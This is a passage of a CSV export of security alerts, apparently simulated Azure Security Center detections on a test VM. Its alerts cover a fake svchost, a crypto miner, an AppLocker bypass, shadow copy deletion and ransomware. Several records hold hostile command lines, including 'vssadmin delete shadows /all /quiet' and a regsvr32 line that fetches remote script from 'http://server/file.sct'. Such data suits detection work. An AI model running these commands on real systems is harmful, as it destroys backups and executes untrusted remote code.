]",Unknown,,,3c1bb38c-82e3-4f8d-a115-a7110ba70d05,contoso77,2019-01-15 09:15:18,/subscriptions/40dcc8bf-0478-4f3b-b275-ed0a94f2c013/resourceGroups/ASIHuntOMSWorkspaceRG/providers/Microsoft.Compute/virtualMachines/MSTICAlertsWin1,46fe7078-61bb-4bed-9430-7ac01d91c273,
54,802d39e1-9d70-404d-832c-2de5e2478eda,2019-01-15 09:15:16,2019-01-15 09:15:16,117b7a02-d1d0-4cf2-bc04-0b19a796b4d3,2518547570835168086_117b7a02-d1d0-4cf2-bc04-0b19a796b4d3,Detection,Microsoft,Suspicious SVCHOST process executed,Suspicious SVCHOST process executed,Suspicious SVCHOST process executed,The system process SVCHOST was observed running in an abnormal context. Malware often uses SVCHOST to masquerade its malicious activity.,High,False,"{
""domain name"": ""MSTICAlertsWin1"",
""user name"": ""MSTICALERTSWIN1\\MSTICAdmin"",
""process name"": ""c:\\diagnostics\\usertmp\\svchost.exe"",
""command line"": ""c:\\diagnostics\\usertmp\\svchost.exe"",
""parent process"": ""cmd.exe"",
""process id"": ""0x1288"",
""account logon id"": ""0x13bded7"",
""User SID"": ""S-1-5-21-996632719-2361334927-4038480536-500"",
""parent process id"": ""0x165c"",
""enrichment_tas_threat__reports"": ""{\""Kind\"":\""MultiLink\"",\""DisplayValueToUrlDictionary\"":{\""Report: Suspicious SVCHost\"":\""https://iflowreportsproda.blob.core.windows.net/reports/MSTI-TS-Suspicious-SVCHost.pdf?sv=2018-03-28&sr=b&sig=LiZbrhSiqrXmXZ40VjKfTmBwA2%2Fllxv7YXgBcwv1MNM%3D&spr=https&st=2019-01-14T15:59:38Z&se=2019-04-14T16:14:38Z&sp=r&callerId=ddd5443d-e6f4-441c-b52b-5278d2f21dfa&tenantId=344d72a7-1b67-426c-bb5a-c14a81f7e675\""}}"",
""resourceType"": ""Virtual Machine"",
""ServiceId"": ""14fa08c7-c48e-4c18-950c-8148024b4398"",
""ReportingSystem"": ""Azure"",
""OccuringDatacenter"": ""eastus""
}","[
{
""$id"": ""4"",
""DnsDomain"": """",
""NTDomain"": """",
""HostName"": ""MSTICALERTSWIN1"",
""NetBiosName"": ""MSTICALERTSWIN1"",
""OSFamily"": ""Windows"",
""OSVersion"": ""Windows"",
""IsDomainJoined"": false,
""Type"": ""host""
},
{
""$id"": ""5"",
""Directory"": ""c:\\windows\\system32"",
""Name"": ""cmd.exe"",
""Type"": ""file""
},
{
""$id"": ""6"",
""ProcessId"": ""0x165c"",
""CommandLine"": """",
""ImageFile"": {
""$ref"": ""5""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""7"",
""Name"": ""MSTICAdmin"",
""NTDomain"": ""MSTICAlertsWin1"",
""Host"": {
""$ref"": ""4""
},
""Sid"": ""S-1-5-21-996632719-2361334927-4038480536-500"",
""IsDomainJoined"": false,
""Type"": ""account"",
""LogonId"": ""0x13bded7""
},
{
""$id"": ""8"",
""Directory"": ""c:\\diagnostics\\usertmp"",
""Name"": ""svchost.exe"",
""Type"": ""file""
},
{
""$id"": ""9"",
""ProcessId"": ""0x1288"",
""CommandLine"": ""c:\\diagnostics\\usertmp\\svchost.exe"",
""ElevationToken"": ""Default"",
""CreationTimeUtc"": ""2019-01-15T09:15:16.4831913Z"",
""ImageFile"": {
""$ref"": ""8""
},
""Account"": {
""$ref"": ""7""
},
""ParentProcess"": {
""$ref"": ""6""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""10"",
""SessionId"": ""0x13bded7"",
""StartTimeUtc"": ""2019-01-15T09:15:16.4831913Z"",
""EndTimeUtc"": ""2019-01-15T09:15:16.4831913Z"",
""Type"": ""host-logon-session"",
""Host"": {
""$ref"": ""4""
},
""Account"": {
""$ref"": ""7""
}
}
]",Unknown,,,3c1bb38c-82e3-4f8d-a115-a7110ba70d05,contoso77,2019-01-15 09:15:20,/subscriptions/40dcc8bf-0478-4f3b-b275-ed0a94f2c013/resourceGroups/ASIHuntOMSWorkspaceRG/providers/Microsoft.Compute/virtualMachines/MSTICAlertsWin1,46fe7078-61bb-4bed-9430-7ac01d91c273,
55,802d39e1-9d70-404d-832c-2de5e2478eda,2019-01-15 09:15:11,2019-01-15 09:15:11,c762b0f7-a0f5-4dda-ab48-54b5ae6eade4,2518547570883109415_c762b0f7-a0f5-4dda-ab48-54b5ae6eade4,Detection,Microsoft,Suspicious Powershell Activity Detected,Suspicious Powershell Activity Detected,Suspicious Powershell Activity Detected,"Analysis of host data detected a powershell script running on MSTICALERTSWIN1 that has features in common with known suspicious scripts. This script could either be legitimate activity, or an indication of a compromised host.",High,False,"{
""Compromised Host"": ""MSTICALERTSWIN1"",
""User Name"": ""MSTICALERTSWIN1\\MSTICAdmin"",
""Account Session Id"": ""0x13bded7"",
""Suspicious Process"": ""c:\\diagnostics\\usertmp\\powershell.exe"",
""Suspicious Command Line"": "".\\powershell invoke-shellcode.ps1"",
""Parent Process"": ""c:\\windows\\system32\\cmd.exe"",
""Suspicious Process Id"": ""0xaa8"",
""Suspicious Script"": "".\\powershell Invoke-Shellcode.ps1"",
""resourceType"": ""Virtual Machine"",
""ServiceId"": ""14fa08c7-c48e-4c18-950c-8148024b4398"",
""ReportingSystem"": ""Azure"",
""OccuringDatacenter"": ""eastus""
}","[
{
""$id"": ""4"",
""DnsDomain"": """",
""NTDomain"": """",
""HostName"": ""MSTICALERTSWIN1"",
""NetBiosName"": ""MSTICALERTSWIN1"",
""OSFamily"": ""Windows"",
""OSVersion"": ""Windows"",
""IsDomainJoined"": false,
""Type"": ""host""
},
{
""$id"": ""5"",
""Directory"": ""c:\\windows\\system32"",
""Name"": ""cmd.exe"",
""Type"": ""file""
},
{
""$id"": ""6"",
""ProcessId"": ""0x165c"",
""CommandLine"": """",
""ImageFile"": {
""$ref"": ""5""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""7"",
""Name"": ""MSTICAdmin"",
""NTDomain"": ""MSTICAlertsWin1"",
""Host"": {
""$ref"": ""4""
},
""Sid"": ""S-1-5-21-996632719-2361334927-4038480536-500"",
""IsDomainJoined"": false,
""Type"": ""account"",
""LogonId"": ""0x13bded7""
},
{
""$id"": ""8"",
""Directory"": ""c:\\diagnostics\\usertmp"",
""Name"": ""powershell.exe"",
""Type"": ""file""
},
{
""$id"": ""9"",
""ProcessId"": ""0xaa8"",
""CommandLine"": "".\\powershell invoke-shellcode.ps1"",
""ElevationToken"": ""Default"",
""CreationTimeUtc"": ""2019-01-15T09:15:11.6890584Z"",
""ImageFile"": {
""$ref"": ""8""
},
""Account"": {
""$ref"": ""7""
},
""ParentProcess"": {
""$ref"": ""6""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""10"",
""SessionId"": ""0x13bded7"",
""StartTimeUtc"": ""2019-01-15T09:15:11.6890584Z"",
""EndTimeUtc"": ""2019-01-15T09:15:11.6890584Z"",
""Type"": ""host-logon-session"",
""Host"": {
""$ref"": ""4""
},
""Account"": {
""$ref"": ""7""
}
}
]",Unknown,,,3c1bb38c-82e3-4f8d-a115-a7110ba70d05,contoso77,2019-01-15 09:15:18,/subscriptions/40dcc8bf-0478-4f3b-b275-ed0a94f2c013/resourceGroups/ASIHuntOMSWorkspaceRG/providers/Microsoft.Compute/virtualMachines/MSTICAlertsWin1,46fe7078-61bb-4bed-9430-7ac01d91c273,MSTICALERTSWIN1
56,802d39e1-9d70-404d-832c-2de5e2478eda,2019-01-15 09:15:10,2019-01-15 09:15:10,72351be4-ae78-4cc6-9f6a-1ff87c31baeb,2518547570895430544_72351be4-ae78-4cc6-9f6a-1ff87c31baeb,Detection,Microsoft,Digital currency mining related behavior detected,Digital currency mining related behavior detected,Digital currency mining related behavior detected,Analysis of host data on MSTICALERTSWIN1 detected the execution of a process or command normally associated with digital currency mining.,High,False,"{
""Compromised Host"": ""MSTICALERTSWIN1"",
""User Name"": ""MSTICALERTSWIN1\\MSTICAdmin"",
""Account Session Id"": ""0x13bded7"",
""Suspicious Process"": ""c:\\diagnostics\\usertmp\\suchost.exe"",
""Suspicious Command Line"": "".\\suchost.exe -a cryptonight -o bcn -u bond007.01 -p x -t 4"",
""Parent Process"": ""c:\\windows\\system32\\cmd.exe"",
""Suspicious Process Id"": ""0x1704"",
""resourceType"": ""Virtual Machine"",
""ServiceId"": ""14fa08c7-c48e-4c18-950c-8148024b4398"",
""ReportingSystem"": ""Azure"",
""OccuringDatacenter"": ""eastus""
}","[
{
""$id"": ""4"",
""DnsDomain"": """",
""NTDomain"": """",
""HostName"": ""MSTICALERTSWIN1"",
""NetBiosName"": ""MSTICALERTSWIN1"",
""OSFamily"": ""Windows"",
""OSVersion"": ""Windows"",
""IsDomainJoined"": false,
""Type"": ""host""
},
{
""$id"": ""5"",
""Directory"": ""c:\\windows\\system32"",
""Name"": ""cmd.exe"",
""Type"": ""file""
},
{
""$id"": ""6"",
""ProcessId"": ""0x165c"",
""CommandLine"": """",
""ImageFile"": {
""$ref"": ""5""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""7"",
""Name"": ""MSTICAdmin"",
""NTDomain"": ""MSTICAlertsWin1"",
""Host"": {
""$ref"": ""4""
},
""Sid"": ""S-1-5-21-996632719-2361334927-4038480536-500"",
""IsDomainJoined"": false,
""Type"": ""account"",
""LogonId"": ""0x13bded7""
},
{
""$id"": ""8"",
""Directory"": ""c:\\diagnostics\\usertmp"",
""Name"": ""suchost.exe"",
""Type"": ""file""
},
{
""$id"": ""9"",
""ProcessId"": ""0x1704"",
""CommandLine"": "".\\suchost.exe -a cryptonight -o bcn -u bond007.01 -p x -t 4"",
""ElevationToken"": ""Default"",
""CreationTimeUtc"": ""2019-01-15T09:15:10.4569455Z"",
""ImageFile"": {
""$ref"": ""8""
},
""Account"": {
""$ref"": ""7""
},
""ParentProcess"": {
""$ref"": ""6""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""10"",
""SessionId"": ""0x13bded7"",
""StartTimeUtc"": ""2019-01-15T09:15:10.4569455Z"",
""EndTimeUtc"": ""2019-01-15T09:15:10.4569455Z"",
""Type"": ""host-logon-session"",
""Host"": {
""$ref"": ""4""
},
""Account"": {
""$ref"": ""7""
}
}
]",Unknown,,,3c1bb38c-82e3-4f8d-a115-a7110ba70d05,contoso77,2019-01-15 09:15:18,/subscriptions/40dcc8bf-0478-4f3b-b275-ed0a94f2c013/resourceGroups/ASIHuntOMSWorkspaceRG/providers/Microsoft.Compute/virtualMachines/MSTICAlertsWin1,46fe7078-61bb-4bed-9430-7ac01d91c273,MSTICALERTSWIN1
57,802d39e1-9d70-404d-832c-2de5e2478eda,2019-01-15 09:15:07,2019-01-15 09:15:07,9868ed7d-397e-4aa4-8dbd-5a1c5f736c1e,2518547570924760670_9868ed7d-397e-4aa4-8dbd-5a1c5f736c1e,Detection,Microsoft,Potential attempt to bypass AppLocker detected,Potential attempt to bypass AppLocker detected,Potential attempt to bypass AppLocker detected,"Analysis of host data on MSTICALERTSWIN1 detected a potential attempt to bypass AppLocker restrictions. AppLocker can be configured to implement a policy that limits what executables are allowed to run on a Windows system. The command line pattern similar to that identified in this alert has been previously associated with attacker attempts to circumvent AppLocker policy by using trusted executables (allowed by AppLocker policy) to execute untrusted code. This could be legitimate activity, or an indication of a compromised host.",High,False,"{
""Compromised Host"": ""MSTICALERTSWIN1"",
""User Name"": ""MSTICALERTSWIN1\\MSTICAdmin"",
""Account Session Id"": ""0x13bded7"",
""Suspicious Process"": ""c:\\diagnostics\\usertmp\\regsvr32.exe"",
""Suspicious Command Line"": "".\\regsvr32 /s /n /u /i:http://server/file.sct scrobj.dll"",
""Parent Process"": ""c:\\windows\\system32\\cmd.exe"",
""Suspicious Process Id"": ""0x173c"",
""resourceType"": ""Virtual Machine"",
""ServiceId"": ""14fa08c7-c48e-4c18-950c-8148024b4398"",
""ReportingSystem"": ""Azure"",
""OccuringDatacenter"": ""eastus""
}","[
{
""$id"": ""4"",
""DnsDomain"": """",
""NTDomain"": """",
""HostName"": ""MSTICALERTSWIN1"",
""NetBiosName"": ""MSTICALERTSWIN1"",
""OSFamily"": ""Windows"",
""OSVersion"": ""Windows"",
""IsDomainJoined"": false,
""Type"": ""host""
},
{
""$id"": ""5"",
""Directory"": ""c:\\windows\\system32"",
""Name"": ""cmd.exe"",
""Type"": ""file""
},
{
""$id"": ""6"",
""ProcessId"": ""0x165c"",
""CommandLine"": """",
""ImageFile"": {
""$ref"": ""5""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""7"",
""Name"": ""MSTICAdmin"",
""NTDomain"": ""MSTICAlertsWin1"",
""Host"": {
""$ref"": ""4""
},
""Sid"": ""S-1-5-21-996632719-2361334927-4038480536-500"",
""IsDomainJoined"": false,
""Type"": ""account"",
""LogonId"": ""0x13bded7""
},
{
""$id"": ""8"",
""Directory"": ""c:\\diagnostics\\usertmp"",
""Name"": ""regsvr32.exe"",
""Type"": ""file""
},
{
""$id"": ""9"",
""ProcessId"": ""0x173c"",
""CommandLine"": "".\\regsvr32 /s /n /u /i:http://server/file.sct scrobj.dll"",
""ElevationToken"": ""Default"",
""CreationTimeUtc"": ""2019-01-15T09:15:07.5239329Z"",
""ImageFile"": {
""$ref"": ""8""
},
""Account"": {
""$ref"": ""7""
},
""ParentProcess"": {
""$ref"": ""6""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""10"",
""SessionId"": ""0x13bded7"",
""StartTimeUtc"": ""2019-01-15T09:15:07.5239329Z"",
""EndTimeUtc"": ""2019-01-15T09:15:07.5239329Z"",
""Type"": ""host-logon-session"",
""Host"": {
""$ref"": ""4""
},
""Account"": {
""$ref"": ""7""
}
}
]",Unknown,,,3c1bb38c-82e3-4f8d-a115-a7110ba70d05,contoso77,2019-01-15 09:15:18,/subscriptions/40dcc8bf-0478-4f3b-b275-ed0a94f2c013/resourceGroups/ASIHuntOMSWorkspaceRG/providers/Microsoft.Compute/virtualMachines/MSTICAlertsWin1,46fe7078-61bb-4bed-9430-7ac01d91c273,MSTICALERTSWIN1
58,802d39e1-9d70-404d-832c-2de5e2478eda,2019-01-15 09:15:16,2019-01-15 09:15:16,b9d79b27-d725-4a87-b7ec-6fc9ec591e8c,2518547570836431794_b9d79b27-d725-4a87-b7ec-6fc9ec591e8c,Detection,Microsoft,Suspicious Volume Shadow Copy Activity,Suspicious Volume Shadow Copy Activity,Suspicious Volume Shadow Copy Activity,"Analysis of host data has detected a shadow copy deletion activity on the resource.
Volume Shadow Copy (VSC) is an important artifact that stores data snapshots.
Some malware, and specifically ransomware, targets VSC to sabotage backup strategies.",High,False,"{
""domain name"": ""MSTICAlertsWin1"",
""user name"": ""MSTICALERTSWIN1\\MSTICAdmin"",
""process name"": ""c:\\windows\\system32\\vssadmin.exe"",
""command line"": ""vssadmin delete shadows /all /quiet"",
""parent process"": ""cmd.exe"",
""process id"": ""0x12b8"",
""account logon id"": ""0x13bded7"",
""User SID"": ""S-1-5-21-996632719-2361334927-4038480536-500"",
""parent process id"": ""0x165c"",
""enrichment_tas_threat__reports"": ""{\""Kind\"":\""MultiLink\"",\""DisplayValueToUrlDictionary\"":{\""Report: Shadow Copy Delete\"":\""https://iflowreportsproda.blob.core.windows.net/reports/MSTI-TS-Shadow-Copy-Delete.pdf?sv=2018-03-28&sr=b&sig=md0FA0lp6ylACLI8tXMVySYKT9S%2FHWJh8VkZ5YrTgSE%3D&spr=https&st=2019-01-14T15:22:59Z&se=2019-04-14T15:37:59Z&sp=r&callerId=ddd5443d-e6f4-441c-b52b-5278d2f21dfa&tenantId=bdb7e59d-8ba8-4351-aa6d-eedc6b916aa5\""}}"",
""resourceType"": ""Virtual Machine"",
""ServiceId"": ""14fa08c7-c48e-4c18-950c-8148024b4398"",
""ReportingSystem"": ""Azure"",
""OccuringDatacenter"": ""eastus""
}","[
{
""$id"": ""4"",
""DnsDomain"": """",
""NTDomain"": """",
""HostName"": ""MSTICALERTSWIN1"",
""NetBiosName"": ""MSTICALERTSWIN1"",
""OSFamily"": ""Windows"",
""OSVersion"": ""Windows"",
""IsDomainJoined"": false,
""Type"": ""host""
},
{
""$id"": ""5"",
""Directory"": ""c:\\windows\\system32"",
""Name"": ""cmd.exe"",
""Type"": ""file""
},
{
""$id"": ""6"",
""ProcessId"": ""0x165c"",
""CommandLine"": """",
""ImageFile"": {
""$ref"": ""5""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""7"",
""Name"": ""MSTICAdmin"",
""NTDomain"": ""MSTICAlertsWin1"",
""Host"": {
""$ref"": ""4""
},
""Sid"": ""S-1-5-21-996632719-2361334927-4038480536-500"",
""IsDomainJoined"": false,
""Type"": ""account"",
""LogonId"": ""0x13bded7""
},
{
""$id"": ""8"",
""Directory"": ""c:\\windows\\system32"",
""Name"": ""vssadmin.exe"",
""Type"": ""file""
},
{
""$id"": ""9"",
""ProcessId"": ""0x12b8"",
""CommandLine"": ""vssadmin delete shadows /all /quiet"",
""ElevationToken"": ""Default"",
""CreationTimeUtc"": ""2019-01-15T09:15:16.3568205Z"",
""ImageFile"": {
""$ref"": ""8""
},
""Account"": {
""$ref"": ""7""
},
""ParentProcess"": {
""$ref"": ""6""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""10"",
""SessionId"": ""0x13bded7"",
""StartTimeUtc"": ""2019-01-15T09:15:16.3568205Z"",
""EndTimeUtc"": ""2019-01-15T09:15:16.3568205Z"",
""Type"": ""host-logon-session"",
""Host"": {
""$ref"": ""4""
},
""Account"": {
""$ref"": ""7""
}
}
]",Unknown,,,3c1bb38c-82e3-4f8d-a115-a7110ba70d05,contoso77,2019-01-15 09:15:20,/subscriptions/40dcc8bf-0478-4f3b-b275-ed0a94f2c013/resourceGroups/ASIHuntOMSWorkspaceRG/providers/Microsoft.Compute/virtualMachines/MSTICAlertsWin1,46fe7078-61bb-4bed-9430-7ac01d91c273,
59,802d39e1-9d70-404d-832c-2de5e2478eda,2019-01-15 09:15:16,2019-01-15 09:15:16,c45bcb62-9d89-44e8-bea9-7a9e35205576,2518547570836535349_c45bcb62-9d89-44e8-bea9-7a9e35205576,Detection,Microsoft,Suspicious double extension file executed,Suspicious double extension file executed,Suspicious double extension file executed,"Analysis of host data indicates an execution of a process with a suspicious double extension.
This extension may trick users into thinking files are safe to be opened and might indicate the presence of malware on the system.",High,False,"{
""domain name"": ""MSTICAlertsWin1"",
""user name"": ""MSTICALERTSWIN1\\MSTICAdmin"",
""process name"": ""c:\\diagnostics\\usertmp\\doubleextension.pdf.exe"",
""command line"": ""c:\\diagnostics\\usertmp\\doubleextension.pdf.exe"",
""parent process"": ""cmd.exe"",
""process id"": ""0x17b0"",
""account logon id"": ""0x13bded7"",
""User SID"": ""S-1-5-21-996632719-2361334927-4038480536-500"",
""parent process id"": ""0x165c"",
""enrichment_tas_threat__reports"": ""{\""Kind\"":\""MultiLink\"",\""DisplayValueToUrlDictionary\"":{\""Report: Suspicious Double Extensions\"":\""https://iflowreportsproda.blob.core.windows.net/reports/MSTI-TS-Suspicious-Double-Extensions.pdf?sv=2018-03-28&sr=b&sig=rUQfTnOeu6Di%2BeniujzU25k1ZRHFUq6xFYsDPUWQf%2BM%3D&spr=https&st=2019-01-14T14:13:02Z&se=2019-04-14T14:28:02Z&sp=r&callerId=ddd5443d-e6f4-441c-b52b-5278d2f21dfa&tenantId=344d72a7-1b67-426c-bb5a-c14a81f7e675\""}}"",
""resourceType"": ""Virtual Machine"",
""ServiceId"": ""14fa08c7-c48e-4c18-950c-8148024b4398"",
""ReportingSystem"": ""Azure"",
""OccuringDatacenter"": ""eastus""
}","[
{
""$id"": ""4"",
""DnsDomain"": """",
""NTDomain"": """",
""HostName"": ""MSTICALERTSWIN1"",
""NetBiosName"": ""MSTICALERTSWIN1"",
""OSFamily"": ""Windows"",
""OSVersion"": ""Windows"",
""IsDomainJoined"": false,
""Type"": ""host""
},
{
""$id"": ""5"",
""Directory"": ""c:\\windows\\system32"",
""Name"": ""cmd.exe"",
""Type"": ""file""
},
{
""$id"": ""6"",
""ProcessId"": ""0x165c"",
""CommandLine"": """",
""ImageFile"": {
""$ref"": ""5""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""7"",
""Name"": ""MSTICAdmin"",
""NTDomain"": ""MSTICAlertsWin1"",
""Host"": {
""$ref"": ""4""
},
""Sid"": ""S-1-5-21-996632719-2361334927-4038480536-500"",
""IsDomainJoined"": false,
""Type"": ""account"",
""LogonId"": ""0x13bded7""
},
{
""$id"": ""8"",
""Directory"": ""c:\\diagnostics\\usertmp"",
""Name"": ""doubleextension.pdf.exe"",
""Type"": ""file""
},
{
""$id"": ""9"",
""ProcessId"": ""0x17b0"",
""CommandLine"": ""c:\\diagnostics\\usertmp\\doubleextension.pdf.exe"",
""ElevationToken"": ""Default"",
""CreationTimeUtc"": ""2019-01-15T09:15:16.346465Z"",
""ImageFile"": {
""$ref"": ""8""
},
""Account"": {
""$ref"": ""7""
},
""ParentProcess"": {
""$ref"": ""6""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""10"",
""SessionId"": ""0x13bded7"",
""StartTimeUtc"": ""2019-01-15T09:15:16.346465Z"",
""EndTimeUtc"": ""2019-01-15T09:15:16.346465Z"",
""Type"": ""host-logon-session"",
""Host"": {
""$ref"": ""4""
},
""Account"": {
""$ref"": ""7""
}
}
]",Unknown,,,3c1bb38c-82e3-4f8d-a115-a7110ba70d05,contoso77,2019-01-15 09:15:20,/subscriptions/40dcc8bf-0478-4f3b-b275-ed0a94f2c013/resourceGroups/ASIHuntOMSWorkspaceRG/providers/Microsoft.Compute/virtualMachines/MSTICAlertsWin1,46fe7078-61bb-4bed-9430-7ac01d91c273,
60,802d39e1-9d70-404d-832c-2de5e2478eda,2019-01-15 09:15:14,2019-01-15 09:15:14,43f7d8f3-fea5-4fca-a884-713c2d65203c,2518547570851316041_43f7d8f3-fea5-4fca-a884-713c2d65203c,Detection,Microsoft,Suspicious process executed,Suspicious process executed,Suspicious process executed,Machine logs indicate that the suspicious process: 'c:\diagnostics\usertmp\dubrute.exe' was running on the machine; this process is associated with carrying out brute force attacks. An attacker may have compromised this host as a launchpad for carrying out further attacks.,High,False,"{
""Compromised Host"": ""MSTICALERTSWIN1"",
""User Name"": ""MSTICALERTSWIN1\\MSTICAdmin"",
""Account Session Id"": ""0x13bded7"",
""Suspicious Process"": ""c:\\diagnostics\\usertmp\\dubrute.exe"",
""Suspicious Command Line"": "".\\dubrute.exe"",
""Parent Process"": ""c:\\windows\\system32\\cmd.exe"",
""Suspicious Process Id"": ""0x166c"",
""resourceType"": ""Virtual Machine"",
""ServiceId"": ""14fa08c7-c48e-4c18-950c-8148024b4398"",
""ReportingSystem"": ""Azure"",
""OccuringDatacenter"": ""eastus""
}","[
{
""$id"": ""4"",
""DnsDomain"": """",
""NTDomain"": """",
""HostName"": ""MSTICALERTSWIN1"",
""NetBiosName"": ""MSTICALERTSWIN1"",
""OSFamily"": ""Windows"",
""OSVersion"": ""Windows"",
""IsDomainJoined"": false,
""Type"": ""host""
},
{
""$id"": ""5"",
""Directory"": ""c:\\windows\\system32"",
""Name"": ""cmd.exe"",
""Type"": ""file""
},
{
""$id"": ""6"",
""ProcessId"": ""0x165c"",
""CommandLine"": """",
""ImageFile"": {
""$ref"": ""5""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""7"",
""Name"": ""MSTICAdmin"",
""NTDomain"": ""MSTICAlertsWin1"",
""Host"": {
""$ref"": ""4""
},
""Sid"": ""S-1-5-21-996632719-2361334927-4038480536-500"",
""IsDomainJoined"": false,
""Type"": ""account"",
""LogonId"": ""0x13bded7""
},
{
""$id"": ""8"",
""Directory"": ""c:\\diagnostics\\usertmp"",
""Name"": ""dubrute.exe"",
""Type"": ""file""
},
{
""$id"": ""9"",
""ProcessId"": ""0x166c"",
""CommandLine"": "".\\dubrute.exe"",
""ElevationToken"": ""Default"",
""CreationTimeUtc"": ""2019-01-15T09:15:14.8683958Z"",
""ImageFile"": {
""$ref"": ""8""
},
""Account"": {
""$ref"": ""7""
},
""ParentProcess"": {
""$ref"": ""6""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""10"",
""SessionId"": ""0x13bded7"",
""StartTimeUtc"": ""2019-01-15T09:15:14.8683958Z"",
""EndTimeUtc"": ""2019-01-15T09:15:14.8683958Z"",
""Type"": ""host-logon-session"",
""Host"": {
""$ref"": ""4""
},
""Account"": {
""$ref"": ""7""
}
}
]",Unknown,,,3c1bb38c-82e3-4f8d-a115-a7110ba70d05,contoso77,2019-01-15 09:15:18,/subscriptions/40dcc8bf-0478-4f3b-b275-ed0a94f2c013/resourceGroups/ASIHuntOMSWorkspaceRG/providers/Microsoft.Compute/virtualMachines/MSTICAlertsWin1,46fe7078-61bb-4bed-9430-7ac01d91c273,MSTICALERTSWIN1
61,802d39e1-9d70-404d-832c-2de5e2478eda,2019-01-15 09:15:16,2019-01-15 09:15:16,26ccc2ad-8ce0-4f60-8215-18f99377b547,2518547570834399134_26ccc2ad-8ce0-4f60-8215-18f99377b547,Detection,Microsoft,Rare SVCHOST service group executed,Rare SVCHOST service group executed,Rare SVCHOST service group executed,The system process SVCHOST was observed running a rare service group. Malware often use SVCHOST to masquerade its malicious activity.,Informational,False,"{
""domain name"": ""MSTICAlertsWin1"",
""user name"": ""MSTICALERTSWIN1\\MSTICAdmin"",
""process name"": ""c:\\windows\\system32\\svchost.exe"",
""command line"": ""c:\\windows\\system32\\svchost.exe -k malicious"",
""parent process"": ""cmd.exe"",
""process id"": ""0x134c"",
""account logon id"": ""0x13bded7"",
""User SID"": ""S-1-5-21-996632719-2361334927-4038480536-500"",
""parent process id"": ""0x165c"",
""enrichment_tas_threat__reports"": ""{\""Kind\"":\""MultiLink\"",\""DisplayValueToUrlDictionary\"":{\""Report: Suspicious SVCHost\"":\""https://iflowreportsproda.blob.core.windows.net/reports/MSTI-TS-Suspicious-SVCHost.pdf?sv=2018-03-28&sr=b&sig=LiCwFh64yyJn1k1fvbXfd7nZFxe9c4Y852b0VekrMJw%3D&spr=https&st=2019-01-14T14:11:54Z&se=2019-04-14T14:26:54Z&sp=r&callerId=ddd5443d-e6f4-441c-b52b-5278d2f21dfa&tenantId=dbb5dbe9-5ab7-455f-96cf-d88ac58c1c00\""}}"",
""resourceType"": ""Virtual Machine"",
""ServiceId"": ""14fa08c7-c48e-4c18-950c-8148024b4398"",
""ReportingSystem"": ""Azure"",
""OccuringDatacenter"": ""eastus""
}","[
{
""$id"": ""4"",
""DnsDomain"": """",
""NTDomain"": """",
""HostName"": ""MSTICALERTSWIN1"",
""NetBiosName"": ""MSTICALERTSWIN1"",
""OSFamily"": ""Windows"",
""OSVersion"": ""Windows"",
""IsDomainJoined"": false,
""Type"": ""host""
},
{
""$id"": ""5"",
""Directory"": ""c:\\windows\\system32"",
""Name"": ""cmd.exe"",
""Type"": ""file""
},
{
""$id"": ""6"",
""ProcessId"": ""0x165c"",
""CommandLine"": """",
""ImageFile"": {
""$ref"": ""5""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""7"",
""Name"": ""MSTICAdmin"",
""NTDomain"": ""MSTICAlertsWin1"",
""Host"": {
""$ref"": ""4""
},
""Sid"": ""S-1-5-21-996632719-2361334927-4038480536-500"",
""IsDomainJoined"": false,
""Type"": ""account"",
""LogonId"": ""0x13bded7""
},
{
""$id"": ""8"",
""Directory"": ""c:\\windows\\system32"",
""Name"": ""svchost.exe"",
""Type"": ""file""
},
{
""$id"": ""9"",
""ProcessId"": ""0x134c"",
""CommandLine"": ""c:\\windows\\system32\\svchost.exe -k malicious"",
""ElevationToken"": ""Default"",
""CreationTimeUtc"": ""2019-01-15T09:15:16.5600865Z"",
""ImageFile"": {
""$ref"": ""8""
},
""Account"": {
""$ref"": ""7""
},
""ParentProcess"": {
""$ref"": ""6""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""10"",
""SessionId"": ""0x13bded7"",
""StartTimeUtc"": ""2019-01-15T09:15:16.5600865Z"",
""EndTimeUtc"": ""2019-01-15T09:15:16.5600865Z"",
""Type"": ""host-logon-session"",
""Host"": {
""$ref"": ""4""
},
""Account"": {
""$ref"": ""7""
}
}
]",Unknown,,,3c1bb38c-82e3-4f8d-a115-a7110ba70d05,contoso77,2019-01-15 09:15:20,/subscriptions/40dcc8bf-0478-4f3b-b275-ed0a94f2c013/resourceGroups/ASIHuntOMSWorkspaceRG/providers/Microsoft.Compute/virtualMachines/MSTICAlertsWin1,46fe7078-61bb-4bed-9430-7ac01d91c273,
62,802d39e1-9d70-404d-832c-2de5e2478eda,2019-01-15 09:15:17,2019-01-15 09:15:17,48327b74-c904-402d-a1d8-2b3a882924e7,2518547570821365949_48327b74-c904-402d-a1d8-2b3a882924e7,Detection,Microsoft,Ransomware indicators detected,Ransomware indicators detected,Ransomware indicators detected,"Analysis of host data indicates suspicious activity traditionally associated with lock-screen and encryption ransomware. Lock screen ransomware displays a full-screen message preventing interactive use of the host and access to its files. Encryption ransomware prevents access by encrypting data files. In both cases a ransom message is typically displayed, requesting payment in order to restore file access.",High,False,"{
""Compromised Host"": ""MSTICALERTSWIN1"",
""User Name"": ""MSTICALERTSWIN1\\MSTICAdmin"",
""Account Session Id"": ""0x13bded7"",
""Suspicious Process"": ""c:\\diagnostics\\usertmp\\ransomware.exe"",
